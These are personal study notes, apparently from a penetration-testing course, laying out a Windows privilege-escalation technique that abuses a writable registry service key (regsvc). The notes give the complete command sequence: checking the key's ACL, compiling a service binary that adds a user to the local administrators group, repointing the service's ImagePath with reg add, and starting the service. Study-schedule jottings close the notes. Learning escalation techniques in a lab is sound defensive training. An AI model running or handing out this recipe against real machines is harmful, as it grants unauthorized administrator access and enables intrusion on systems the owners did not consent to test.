Service escalation dealing with the registry
Checking the registry service to see if we have FullControl over a registry key
to check for it (in Powershell):
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
It says FullControl over this (means we can exploit)
We can add this executable to a service and start this service and the service will come back and add a user for us
Get the file from the windows machine using FTP:
Kali:
python3 -m pyftpdlib -p 21 --write
#If you need to install: pip3 install pyftpdlibIn Windows:
Go to source files location and open CMD from that folder by shift+right clicking then:
ftp 10.6.62.12
anonymous
anonymous
put windows_service.cIn Kali:
Stop the FTP (ctrl+c):
sudo mousepad windows_service.c Change the whoami command to what you want (adding a user to admins):
cmd.exe /k net localgroup administrators user /addMake an executable:
x86_64-w64-mingw32-gcc windows_service.c -o x.exeHost server to move x.exe to the Windows machine in Temp:
Download > Save > Local C > TempIn Windows:
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /fAdd to regsvc
/v: what registry entry do I want to be adding for this subkey. What’s the value name
ImagePath is a registry key that contains the path of the drivers image file
/t: the type
REG_EXPAND_SZ: the type is a string value
/d: the data
c:\temp\x.exe: where the data is
/f: don’t prompt me for this. I don’t want any confirmation when I run this; Just execute.
Run it/Start it:
sc start regsvcconfirm:
net localgroup administrators3:30 hours left including notes on 1.5x
I think linux was 6 hours
Current combined time is about 10:30 hours including notes on 1.5x
2 days 5:30 each (4/8 4/9)
4/10 review PEH (maybe web app pentesting?)